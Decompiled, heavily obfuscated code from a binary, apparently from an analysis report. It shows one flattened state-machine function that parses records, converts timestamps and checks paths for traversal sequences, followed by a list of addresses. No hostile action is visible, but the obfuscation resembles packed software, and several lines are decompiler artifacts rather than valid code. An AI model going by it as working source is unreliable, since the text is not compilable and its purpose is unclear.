								_t725 =  !( !( !( !(( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) |  !(( *(_v840 + _v944 + 2) & 0x000000ff) << 0x10)) | (( *(_v840 + _v944 + 2) & 0x000000ff) << 0x00000010 & 0x001b0000 |  !(( *(_v840 + _v944 + 2) & 0x000000ff) << 0x10) & 0x9de4ecd3) ^ ((( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) & 0x0000132c |  !(( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) & 0x9de4ecd3)) |  !(( *(_v840 + _v944 + 3) & 0x000000ff) << 0x18)) | (( *(_v840 + _v944 + 3) & 0x000000ff) << 0x00000018 & 0x72000000 |  !(( *(_v840 + _v944 + 3) & 0x000000ff) << 0x18) & 0x8d7f7e26) ^ (( !( !(( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) |  !(( *(_v840 + _v944 + 2) & 0x000000ff) << 0x10)) | (( *(_v840 + _v944 + 2) & 0x000000ff) << 0x00000010 & 0x001b0000 |  !(( *(_v840 + _v944 + 2) & 0x000000ff) << 0x10) & 0x9de4ecd3) ^ ((( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) & 0x0000132c |  !(( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) & 0x9de4ecd3)) & 0x108081d9 |  !( !( !(( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) |  !(( *(_v840 + _v944 + 2) & 0x000000ff) << 0x10)) | (( *(_v840 + _v944 + 2) & 0x000000ff) << 0x00000010 & 0x001b0000 |  !(( *(_v840 + _v944 + 2) & 0x000000ff) << 0x10) & 0x9de4ecd3) ^ ((( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) & 0x0000132c |  !(( *(_v944 + _v840) & 0xf8 |  !( *(_v944 + _v840) & 0x000000ff) & 0xf04e0d07) ^ (( *(_v840 + _v944 + 1) & 0x000000ff) << 0x00000008 & 0x0000f200 |  !(( *(_v840 + _v944 + 1) & 0x000000ff) << 8) & 0xf04e0d07)) & 0x9de4ecd3)) & 0x8d7f7e26);
								_t961 = _t725 * 0x989680 >> 0x20;
								 *_t1031 = 0xd53e8000 + _t725 * 0x989680;
								asm("adc edx, eax");
								_t467 = 0xc5cd7730;
								_t1031[2] = 0x989680;
								continue;
							}
							__eflags = _t806 - 0x1fa8d466;
							_t467 = _t806;
							if(_t806 == 0x1fa8d466) {
								__eflags = _v944;
								_t729 =  *0x984a84; // 0x0
								_t1031 = 0x148f894a;
								_t763 = 0x3c2044d5;
								_t79 = _t729 - 1; // -1
								_v937 = _v944 == 0;
								_t933 = _t79 * _t729;
								_t730 = 0x3c2044d5;
								L156:
								_t935 =  !_t933 | 0xfffffffe;
								__eflags = _t935 - 0xffffffff;
								_t731 =  ==  ? _t1031 : _t730;
								__eflags =  *0x984a88 - 0xa;
								_t732 =  >=  ? _t763 :  ==  ? _t1031 : _t730;
								_t961 = (_t961 & 0xffffff00 |  *0x984a88 - 0x0000000a < 0x00000000) ^ (_t935 & 0xffffff00 | _t935 == 0xffffffff);
								_t467 =  !=  ? _t1031 :  >=  ? _t763 :  ==  ? _t1031 : _t730;
							}
							continue;
						}
						__eflags = _t806 - 0x4c387d;
						if(_t806 <= 0x4c387d) {
							__eflags = _t806 - 0xf6783a3f;
							if(_t806 == 0xf6783a3f) {
								E009710E0(_v1144, _a8, 0x230);
								_t1041 = _t1041 + 0xc;
								 *_v984 = _a4;
								_v1156 = 0;
								_t467 = 0x2b2ce966;
							} else {
								__eflags = _t806 - 0xfea5e578;
								_t467 = _t806;
								if(_t806 == 0xfea5e578) {
									_t961 = 0xccb34fff;
									__eflags = (_v847 & 0x000000ff ^ 0x000000fe) & _v847 & 0x000000ff;
									_t467 =  ==  ? 0xccb34fff : 0xc51ebb3e;
								}
							}
							continue;
						}
						__eflags = _t806 - 0x4c387e;
						if(__eflags == 0) {
							_t763 = _v1080;
							_push(_t763);
							_v944 = E0096FB7F(_t763, _t961, _t1031, _t1037, __eflags);
							_t743 = E00963570(_t961, _v944, 1, _t763,  *((intOrPtr*)( *_v996)));
							_t1041 = _t1041 + 0x14;
							__eflags = _t743 - _v1080;
							_t467 =  ==  ? 0x7e21f752 : 0x802db09b;
							continue;
						}
						__eflags = _t806 - 0x7b1de65;
						if(_t806 == 0x7b1de65) {
							_t745 =  *0x984a84; // 0x0
							_t1031 = 0x3fff0b54;
							_t763 = 0x3fc10f67;
							_t193 = _t745 - 1; // -1
							_t933 = _t193 * _t745;
							__eflags = _t933;
							_t730 = 0x3fc10f67;
							goto L156;
						} else {
							__eflags = _t806 - 0xc4a4b7d;
							_t467 = _t806;
							if(_t806 == 0xc4a4b7d) {
								E00965990(_t961, _v992);
								_t1041 = _t1041 + 4;
								_t467 = 0x76c4b56c;
							}
							continue;
						}
					}
					if(_t806 <= 0x2b2ce965) {
						__eflags = _t806 - 0x270933bb;
						if(_t806 <= 0x270933bb) {
							__eflags = _t806 - 0x24d6a968;
							_t467 = _t806;
							if(_t806 == 0x24d6a968) {
								__eflags = _v24 ^ _t1038;
								E0096FB8D(_t467, _t763, _v24 ^ _t1038, _t961, _t1031, _t1037);
								return _v1200;
							}
						} else {
							__eflags = _t806 - 0x270933bc;
							if(_t806 == 0x270933bc) {
								__eflags = _v856[1] - 0x3a;
								_t467 =  ==  ? 0x7b1de65 : 0xd70e7ee6;
							} else {
								__eflags = _t806 - 0x278da6a5;
								if(_t806 == 0x278da6a5) {
									_t961 = _v1152;
									__eflags = _v1148 - 6;
									_t467 =  ==  ? 0x33c42401 : 0x50380b0c;
									_v1172 = _t961;
								} else {
									__eflags = _t806 - 0x278ec058;
									_t467 = _t806;
									if(_t806 == 0x278ec058) {
										_t753 = E009717BA(_t806, _v856, L"/..\\");
										_t1041 = _t1041 + 8;
										_v908 = _t753;
										__eflags = _v908;
										_t467 =  ==  ? 0xb0b9b9c9 : 0xb34a699d;
									}
								}
							}
						}
						continue;
					}
					if(_t806 > 0x3034cd0f) {
						__eflags = _t806 - 0x3034cd10;
						if(_t806 == 0x3034cd10) {
							E0096FB88(_v944);
							_t1041 = _t1041 + 4;
							_t467 = 0xf6783a3f;
						} else {
							__eflags = _t806 - 0x31c0f505;
							if(_t806 == 0x31c0f505) {
								_v1148 = 7;
								_v1152 = _v1160;
								_t467 = 0x278da6a5;
							} else {
								__eflags = _t806 - 0x33c42401;
								_t467 = _t806;
								if(_t806 == 0x33c42401) {
									_v844 = _v1172;
									_v876 = _v844 + 4;
									__eflags = _v876 - _v1080;
									_t467 =  <  ? 0xeac6090b : 0x50380b0c;
								}
							}
						}
						continue;
					}
					if(_t806 == 0x2b2ce966) {
						_v1196 = _v1156;
						_t467 = 0xf25a0c1a;
						continue;
					}
					if(_t806 == 0x2e63c5be) {
						_t616 = _v912;
						goto L195;
					} else {
						_t467 = _t806;
						if(_t806 == 0x2fcaea3a) {
							_t467 = 0xa67f9737;
						}
						continue;
					}
					L10:
					__eflags = _t806 - 0xc1ad2683;
					if(_t806 > 0xc1ad2683) {
						__eflags = _t806 - 0xda43e1ae;
						if(_t806 <= 0xda43e1ae) {
							__eflags = _t806 - 0xc9485494;
							if(_t806 > 0xc9485494) {
								__eflags = _t806 - 0xccb34ffe;
								if(_t806 <= 0xccb34ffe) {
									__eflags = _t806 - 0xc9485495;
									if(_t806 == 0xc9485495) {
										_v1160 = _v836 + 4;
										_t763 = 0xd53e8000;
										_t1031 = _v884;
										_t476 = (( *(_v836 + _v944 + 3) & 0x000000ff) << 0x00000018 & 0x56000000 |  !(( *(_v836 + _v944 + 3) & 0x000000ff) << 0x18) & 0xa98409c8) ^ ((( *(_v836 + _v944 + 2) & 0x000000ff) << 0x00000010 | ( *(_v836 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v836) & 0x000000ff) & 0x007bf637 |  !(( *(_v836 + _v944 + 2) & 0x000000ff) << 0x00000010 | ( *(_v836 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v836) & 0x000000ff) & 0xa98409c8);
										_t961 = _t476 * 0x989680 >> 0x20;
										 *_t1031 = 0xd53e8000 + _t476 * 0x989680;
										asm("adc edx, eax");
										_t467 = 0x31c0f505;
										_t1031[2] = _t961;
									} else {
										__eflags = _t806 - 0xcaa0b367;
										_t467 = _t806;
										if(_t806 == 0xcaa0b367) {
											_v1208 = 5;
											_t467 = 0x72d4a841;
											_v1204 = _v916;
										}
									}
									continue;
								}
								__eflags = _t806 - 0xccb34fff;
								if(_t806 == 0xccb34fff) {
									__eflags = ( !(_v848 & 0x000000ff) | 0x000000fe) - 0xff;
									_t467 =  ==  ? 0x8cdd1b94 : 0x1561f066;
									continue;
								}
								__eflags = _t806 - 0xd1f1bf49;
								if(_t806 == 0xd1f1bf49) {
									_t484 =  *0x984a84; // 0x0
									_t821 =  *0x984a88; // 0x0
									_t1031 = 0x40973e0d;
									_t318 = _t484 - 1; // -1
									_t961 =  !(_t318 * _t484) | 0xfffffffe;
									_t961 - 0xffffffff = _t821 - 0xa;
									_t763 =  !=  ? 0x40973e0d : 0x962075be;
									__eflags = _t961 - 0xffffffff;
									goto L190;
								} else {
									__eflags = _t806 - 0xd70e7ee6;
									_t467 = _t806;
									if(_t806 == 0xd70e7ee6) {
										_v928 =  *_v856 & 0x0000ffff;
										__eflags = _v928 - 0x5c;
										_t467 =  ==  ? 0xada58a21 : 0x7309d9f7;
									}
									continue;
								}
							}
							__eflags = _t806 - 0xc47c479d;
							if(_t806 <= 0xc47c479d) {
								__eflags = _t806 - 0xc1ad2684;
								if(_t806 == 0xc1ad2684) {
									_t496 = E009631C0( *((intOrPtr*)( *_v996)), _v1088, 0);
									_t1041 = _t1041 + 0xc;
									__eflags = _t496;
									_t467 =  ==  ? 0x4c387e : 0x938c33ee;
								} else {
									__eflags = _t806 - 0xc4179e0f;
									_t467 = _t806;
									if(_t806 == 0xc4179e0f) {
										E009675C0(_v972);
										_t1041 = _t1041 + 4;
										_t467 = 0xa67f9737;
									}
								}
								continue;
							}
							__eflags = _t806 - 0xc47c479e;
							if(_t806 == 0xc47c479e) {
								_t763 = 0x3486bad8;
								_t1031 = 0xb1b46edd;
								_v980 =  *_v996;
								_t501 = _v980;
								__eflags =  *((intOrPtr*)(_t501 + 0x10)) - _a4;
								_t502 =  *0x984a84; // 0x0
								_t213 = _t502 - 1; // -1
								_v973 =  *((intOrPtr*)(_t501 + 0x10)) - _a4 > 0;
								_t503 = 0xb1b46edd;
								_t828 =  !(_t213 * _t502) | 0xfffffffe;
								__eflags = _t828 - 0xffffffff;
								goto L162;
							} else {
								__eflags = _t806 - 0xc51ebb3e;
								if(_t806 == 0xc51ebb3e) {
									_t961 = _v900;
									 *_t961 =  *_v900 ^ 0x00000002 |  *_v900 & 0x00000002;
									_t467 = 0xccb34fff;
								} else {
									__eflags = _t806 - 0xc5cd7730;
									_t467 = _t806;
									if(_t806 == 0xc5cd7730) {
										_v836 = _v1168;
										__eflags = _v861;
										_t961 = _v836;
										_t467 =  !=  ? 0xc9485495 : 0x31c0f505;
										_v1160 = _t961;
									}
								}
								continue;
							}
						}
						__eflags = _t806 - 0xea1b7af1;
						if(_t806 <= 0xea1b7af1) {
							__eflags = _t806 - 0xe6c95ff7;
							if(_t806 <= 0xe6c95ff7) {
								__eflags = _t806 - 0xda43e1af;
								if(_t806 == 0xda43e1af) {
									_t512 = E009717BA(_t806, _v856, L"\\..\\");
									_t1041 = _t1041 + 8;
									_v924 = _t512;
									__eflags = _v924;
									_t467 =  ==  ? 0x7439d606 : 0x5961a97f;
								} else {
									__eflags = _t806 - 0xe0a0c47a;
									_t467 = _t806;
									if(_t806 == 0xe0a0c47a) {
										_t467 = 0x2b2ce966;
										_v1156 = 0x800;
									}
								}
								continue;
							}
							__eflags = _t806 - 0xe6c95ff8;
							if(_t806 == 0xe6c95ff8) {
								L128:
								_v1212 =  &(_v856[1]);
								_t467 = 0xea1b7af2;
							} else {
								__eflags = _t806 - 0xe749888b;
								if(_t806 == 0xe749888b) {
									_v988 = _v1140;
									__eflags =  *_v988 - 0xffffffff;
									_t467 =  ==  ? 0x76c4b56c : 0xc4a4b7d;
								} else {
									__eflags = _t806 - 0xe922c03d;
									_t467 = _t806;
									if(_t806 == 0xe922c03d) {
										_t467 = 0xea1b7af2;
										_v1212 = _v932;
									}
								}
							}
						} else {
							__eflags = _t806 - 0xf25a0c19;
							if(_t806 > 0xf25a0c19) {
								__eflags = _t806 - 0xf25a0c1a;
								if(_t806 == 0xf25a0c1a) {
									_v1200 = _v1196;
									_t467 = 0x24d6a968;
								} else {
									__eflags = _t806 - 0xf3d0610f;
									if(_t806 == 0xf3d0610f) {
										_v968 =  &_v1076;
										_t527 =  &_v284;
										_v964 = _t527;
										_v960 = _t527;
										E00965C90( *_v996,  &_v1076, 0, _v960, 0x104, 0, 0, 0, 0);
										_t531 =  &_v1080;
										_v956 = _t531;
										_t533 =  &_v1084;
										_v952 = _t533;
										_t961 = _t533;
										_t535 =  &_v1088;
										_v948 = _t535;
										_t1031 = _t535;
										_push(_t531);
										_push(_t535);
										_push(_t961);
										_push( *_v996);
										_t538 = E00967980();
										_t1041 = _t1041 + 0x34;
										__eflags = _t538;
										_t467 =  ==  ? 0xc1ad2684 : 0x7fd59e22;
									} else {
										__eflags = _t806 - 0xf499ee08;
										_t467 = _t806;
										if(_t806 == 0xf499ee08) {
											_v840 = _v1164;
											__eflags = _v862;
											_t961 = _v840;
											_t467 =  !=  ? 0x194b54ec : 0xc5cd7730;
											_v1168 = _t961;
										}
									}
								}
							} else {
								__eflags = _t806 - 0xea1b7af2;
								if(_t806 == 0xea1b7af2) {
									_v856 = _v1212;
									__eflags =  *_v856;
									_t467 =  ==  ? 0xd70e7ee6 : 0x270933bc;
								} else {
									__eflags = _t806 - 0xeac6090b;
									if(_t806 == 0xeac6090b) {
										_t961 = 0x92559947;
										_v872 =  &_v807;
										_v807 =  *(_v944 + _v844) & 0x000000ff;
										_v806 =  *(_v844 + _v944 + 1) & 0x000000ff;
										_v805 = 0;
										_v868 =  *(_v944 + _v844 + 2) & 0x000000ff;
										_t467 =  ==  ? 0x92559947 : 0x3bb8b289;
									} else {
										__eflags = _t806 - 0xef4e2b3b;
										_t467 = _t806;
										if(_t806 == 0xef4e2b3b) {
											_t556 = E00972F88(_v1132, _v852);
											_t1041 = _t1041 + 8;
											_t1031 = 0x7a24508d;
											_t961 = _v1076 >> 8;
											_v904 = _v1024;
											_t557 = _t556 & 0xffffff00 | __eflags == 0x00000000;
											__eflags = _t961 - 7;
											_t558 = _t557 & 0xffffff00 | _t961 == 0x00000007;
											_t961 - 0xb = _t961 - 0xe;
											_t567 = ((((((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001 | (((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001) ^ 0x00000001 | (((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001 ^ (((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001) & 0xffffff00 | _t961 == 0x0000000e) ^ ((((((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001 | (((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001) ^ 0x00000001 | (((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001 ^ (((_t557 & 0xffffff00 | _t961 == 0x00000007) ^ (_t557 & 0xffffff00 | _t961 == 0x00000007) | (_t557 & 0xffffff00 | _t961 == 0x00000007) & _t558) & 0xffffff00 | _t961 != 0x0000000b) ^ 0x00000001) & 0xffffff00 | _t961 == 0x0000000e);
											__eflags = _t567 & 0x00000001;
											_t763 =  !=  ? 0x7a24508d : 0xbc8a7546;
											__eflags = _t567 & 0x00000001;
											_t569 =  !=  ? 0x7a24508d : 0xbc8a7546;
											__eflags = _t961 - 0xe;
											_t467 =  !=  ? 0xbc8a7546 :  !=  ? 0x7a24508d : 0xbc8a7546;
											_v1180 = _v904 >> 0x0000001e & 0x00000001;
											_v1184 = 0;
											_v1188 = 0;
											_v1176 =  !(_v904 >> 0x17) & 0x00000001;
											_v1192 = 1;
										}
									}
								}
							}
						}
						continue;
					}
					__eflags = _t806 - 0xa705b110;
					if(_t806 <= 0xa705b110) {
						__eflags = _t806 - 0x8cdd1b93;
						if(_t806 > 0x8cdd1b93) {
							__eflags = _t806 - 0x938c33ed;
							if(_t806 <= 0x938c33ed) {
								__eflags = _t806 - 0x8cdd1b94;
								if(_t806 == 0x8cdd1b94) {
									__eflags = ( !(_v846 & 0x000000ff) | 0x000000fe) - 0xff;
									_t467 =  ==  ? 0x410ae214 : 0x5a52d619;
								} else {
									__eflags = _t806 - 0x92559947;
									_t467 = _t806;
									if(_t806 == 0x92559947) {
										_t576 =  !( *(_v944 + _v876) & 0x000000ff);
										__eflags = (_t576 | 0xfffffffd) - 0xffffffff;
										_v862 = (_t576 | 0xfffffffd) != 0xffffffff;
										__eflags = (_t576 | 0xfffffffb) - 0xffffffff;
										_v861 = (_t576 | 0xfffffffb) != 0xffffffff;
										__eflags = (_t576 | 0xfffffffe) - 0xffffffff;
										_v860 = _v844 + 5;
										_t961 = _v860;
										_t467 =  ==  ? 0xf499ee08 : 0x39dba169;
										_v1164 = _t961;
									}
								}
							} else {
								__eflags = _t806 - 0x938c33ee;
								if(_t806 == 0x938c33ee) {
									_t467 = 0xf25a0c1a;
									_v1196 = 0x800;
								} else {
									__eflags = _t806 - 0x962075be;
									if(_t806 == 0x962075be) {
										_t467 = 0x40973e0d;
									} else {
										__eflags = _t806 - 0xa67f9737;
										_t467 = _t806;
										if(_t806 == 0xa67f9737) {
											_v972 =  *_v996;
											__eflags =  *((intOrPtr*)(_v972 + 0x10)) - _a4;
											_t467 =  <  ? 0xc4179e0f : 0xf3d0610f;
										}
									}
								}
							}
							continue;
						}
						__eflags = _t806 - 0x84f2ab49;
						if(_t806 <= 0x84f2ab49) {
							__eflags = _t806 - 0x802db09b;
							if(_t806 == 0x802db09b) {
								_t587 =  *0x984a84; // 0x0
								_t821 =  *0x984a88; // 0x0
								_t1031 = 0x1fa8d466;
								_t395 = _t587 - 1; // -1
								_t961 = _t395 * _t587;
								_t589 = _t961 ^ 0xfffffffe;
								_t589 & _t961 = _t821 - 0xa;
								__eflags = ((_t763 & 0xffffff00 | (_t589 & _t961) == 0x00000000) & 0xffffff00 | _t821 - 0x0000000a < 0x00000000) ^ ((_t763 & 0xffffff00 | (_t589 & _t961) == 0x00000000) & 0xffffff00 | _t821 - 0x0000000a < 0x00000000);
								_t795 = 0x3c2044d5;
								goto L189;
							}
							__eflags = _t806 - 0x83b108af;
							_t467 = _t806;
							if(_t806 == 0x83b108af) {
								E0096FB88(_v944);
								_t1041 = _t1041 + 4;
								_t467 = 0xe0a0c47a;
							}
							continue;
						}
						__eflags = _t806 - 0x84f2ab4a;
						if(_t806 == 0x84f2ab4a) {
							E009710E0(_a8, _v1144, 0x230);
							_t1041 = _t1041 + 0xc;
							goto L170;
						} else {
							__eflags = _t806 - 0x86cb41a2;
							if(_t806 == 0x86cb41a2) {
								_t467 = 0x24d6a968;
								_v1200 = 0x10000;
							} else {
								__eflags = _t806 - 0x89c27295;
								_t467 = _t806;
								if(_t806 == 0x89c27295) {
									_t961 = _v900;
									 *_t961 =  *_v900 & 0x00000020 | ( *_v900 & 0xad5396c9 |  !( *_v900) & 0x52ac6936) ^ 0x52ac6916;
									_t467 = 0xfea5e578;
								}
							}
							continue;
						}
					}
					__eflags = _t806 - 0xb1bc2972;
					if(_t806 <= 0xb1bc2972) {
						__eflags = _t806 - 0xaf9c5320;
						if(_t806 <= 0xaf9c5320) {
							__eflags = _t806 - 0xa705b111;
							if(_t806 == 0xa705b111) {
								_v996 = _v1116;
								_v992 =  *_v996;
								__eflags =  *((intOrPtr*)(_v992 + 4)) - _a4;
								_t467 =  >  ? 0xe749888b : 0x86cb41a2;
								continue;
							}
							__eflags = _t806 - 0xada58a21;
							_t467 = _t806;
							if(_t806 != 0xada58a21) {
								continue;
							}
							goto L128;
						} else {
							__eflags = _t806 - 0xaf9c5321;
							if(_t806 == 0xaf9c5321) {
								_t467 = 0x3034cd10;
							} else {
								__eflags = _t806 - 0xb0b9b9c9;
								if(_t806 == 0xb0b9b9c9) {
									_v1208 = 4;
									_t467 = 0x72d4a841;
									_v1204 = _v856;
								} else {
									__eflags = _t806 - 0xb1b46edd;
									_t467 = _t806;
									if(_t806 == 0xb1b46edd) {
										_t467 = 0xc47c479e;
									}
								}
							}
							continue;
						}
					}
					__eflags = _t806 - 0xbc8a7545;
					if(_t806 > 0xbc8a7545) {
						__eflags = _t806 - 0xbc8a7546;
						if(_t806 == 0xbc8a7546) {
							_v900 = _t1037;
							__eflags = (_v1180 ^ 0x000000fe) & _v1180;
							_v848 = _v1176;
							_v847 = _v1184;
							_v846 = _v1188;
							_v845 = _v1192;
							 *_v900 = 0;
							_t467 =  ==  ? 0xc02a8f9d : 0xb514cb7f;
						} else {
							__eflags = _t806 - 0xbcca51de;
							if(_t806 == 0xbcca51de) {
								_t610 = E009717BA(_t806, _v856, L"/../");
								_t1041 = _t1041 + 8;
								_v912 = _t610;
								__eflags = _v912;
								_t467 =  ==  ? 0x278ec058 : 0x2e63c5be;
							} else {
								__eflags = _t806 - 0xc02a8f9d;
								_t467 = _t806;
								if(_t806 == 0xc02a8f9d) {
									__eflags = ( !(_v845 & 0x000000ff) | 0x000000fe) - 0xff;
									_t467 =  ==  ? 0xfea5e578 : 0x89c27295;
								}
							}
						}
						continue;
					}
					_t467 = _v1108;
					__eflags = _t806 - 0xb1bc2973;
					if(_t806 == 0xb1bc2973) {
						continue;
					}
					__eflags = _t806 - 0xb34a699d;
					if(_t806 == 0xb34a699d) {
						_t616 = _v908;
						goto L195;
					} else {
						__eflags = _t806 - 0xb514cb7f;
						_t467 = _t806;
						if(_t806 == 0xb514cb7f) {
							 *_v900 = 0x10;
							_t467 = 0xc02a8f9d;
						}
						continue;
					}
				}
			}




























































































































































                                                                                                                              0x0096b059
                                                                                                                              0x0096b05f
                                                                                                                              0x0096b06f
                                                                                                                              0x0096b07b
                                                                                                                              0x0096b07f
                                                                                                                              0x0096b087
                                                                                                                              0x0096b090
                                                                                                                              0x0096b093
                                                                                                                              0x0096b096
                                                                                                                              0x0096b09d
                                                                                                                              0x0096b0b3
                                                                                                                              0x0096b0b7
                                                                                                                              0x0096b0c0
                                                                                                                              0x0096b0c4
                                                                                                                              0x0096b0c8
                                                                                                                              0x0096b0d2
                                                                                                                              0x0096b0d6
                                                                                                                              0x0096b0d9
                                                                                                                              0x0096b0dd
                                                                                                                              0x0096b0e1
                                                                                                                              0x0096b0e5
                                                                                                                              0x0096b0e9
                                                                                                                              0x0096b0ed
                                                                                                                              0x0096b0f1
                                                                                                                              0x0096b0f6
                                                                                                                              0x0096b100
                                                                                                                              0x0096b100
                                                                                                                              0x0096b107
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0096b109
                                                                                                                              0x0096b10f
                                                                                                                              0x0096b1f0
                                                                                                                              0x0096b1f6
                                                                                                                              0x0096b44c
                                                                                                                              0x0096b452
                                                                                                                              0x0096b71b
                                                                                                                              0x0096b721
                                                                                                                              0x0096bc4a
                                                                                                                              0x0096bc50
                                                                                                                              0x0096c7c1
                                                                                                                              0x0096c7c6
                                                                                                                              0x0096c7cc
                                                                                                                              0x0096c7d1
                                                                                                                              0x0096c7d4
                                                                                                                              0x0096c7d9
                                                                                                                              0x0096c7e1
                                                                                                                              0x0096c7ee
                                                                                                                              0x0096c7f1
                                                                                                                              0x0096c7fc
                                                                                                                              0x0096c7ff
                                                                                                                              0x0096c802
                                                                                                                              0x0096c805
                                                                                                                              0x0096c808
                                                                                                                              0x0096b100
                                                                                                                              0x0096b100
                                                                                                                              0x0096b107
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0096b107
                                                                                                                              0x0096b100
                                                                                                                              0x0096bc56
                                                                                                                              0x0096bc5c
                                                                                                                              0x0096bc5e
                                                                                                                              0x0096b100
                                                                                                                              0x0096b100
                                                                                                                              0x0096b107
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0096b107
                                                                                                                              0x00000000
                                                                                                                              0x0096b100
                                                                                                                              0x0096bc6b
                                                                                                                              0x0096bc70
                                                                                                                              0x0096bc78
                                                                                                                              0x0096bc7f
                                                                                                                              0x0096bc84
                                                                                                                              0x0096bc87
                                                                                                                              0x0096bc8f
                                                                                                                              0x0096bc91
                                                                                                                              0x0096bf37
                                                                                                                              0x0096bf37
                                                                                                                              0x0096bf3a
                                                                                                                              0x0096bf3d
                                                                                                                              0x0096bf47
                                                                                                                              0x0096bf4a
                                                                                                                              0x0096bf4c
                                                                                                                              0x00000000
                                                                                                                              0x0096b727
                                                                                                                              0x0096b727
                                                                                                                              0x0096b72d
                                                                                                                              0x0096c1f3
                                                                                                                              0x0096c1f6
                                                                                                                              0x0096c1fa
                                                                                                                              0x0096c207
                                                                                                                              0x0096c20d
                                                                                                                              0x0096c214
                                                                                                                              0x0096c22d
                                                                                                                              0x0096c249
                                                                                                                              0x0096c25b
                                                                                                                              0x0096c260
                                                                                                                              0x0096c273
                                                                                                                              0x0096c283
                                                                                                                              0x0096c285
                                                                                                                              0x0096c28d
                                                                                                                              0x0096c29c
                                                                                                                              0x0096c2af
                                                                                                                              0x0096c2c3
                                                                                                                              0x0096c2c7
                                                                                                                              0x0096c2cb
                                                                                                                              0x0096c2cf
                                                                                                                              0x0096c2e1
                                                                                                                              0x0096c2eb
                                                                                                                              0x0096c300
                                                                                                                              0x0096c304
                                                                                                                              0x0096c30c
                                                                                                                              0x0096c321
                                                                                                                              0x0096c325
                                                                                                                              0x0096c32d
                                                                                                                              0x0096c342
                                                                                                                              0x0096c34a
                                                                                                                              0x0096c34e
                                                                                                                              0x0096c352
                                                                                                                              0x0096b733
                                                                                                                              0x0096b733
                                                                                                                              0x0096b737
                                                                                                                              0x0096b73d
                                                                                                                              0x0096b743
                                                                                                                              0x0096b749
                                                                                                                              0x0096b74b
                                                                                                                              0x0096b751
                                                                                                                              0x0096b763
                                                                                                                              0x0096b763
                                                                                                                              0x0096b74b
                                                                                                                              0x0096b73d
                                                                                                                              0x0096b100
                                                                                                                              0x0096b100
                                                                                                                              0x0096b107
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0096b107
                                                                                                                              0x0096b100
                                                                                                                              0x0096b458
                                                                                                                              0x0096b458
                                                                                                                              0x0096b45e
                                                                                                                              0x0096b981
                                                                                                                              0x0096b987
                                                                                                                              0x0096c6ae
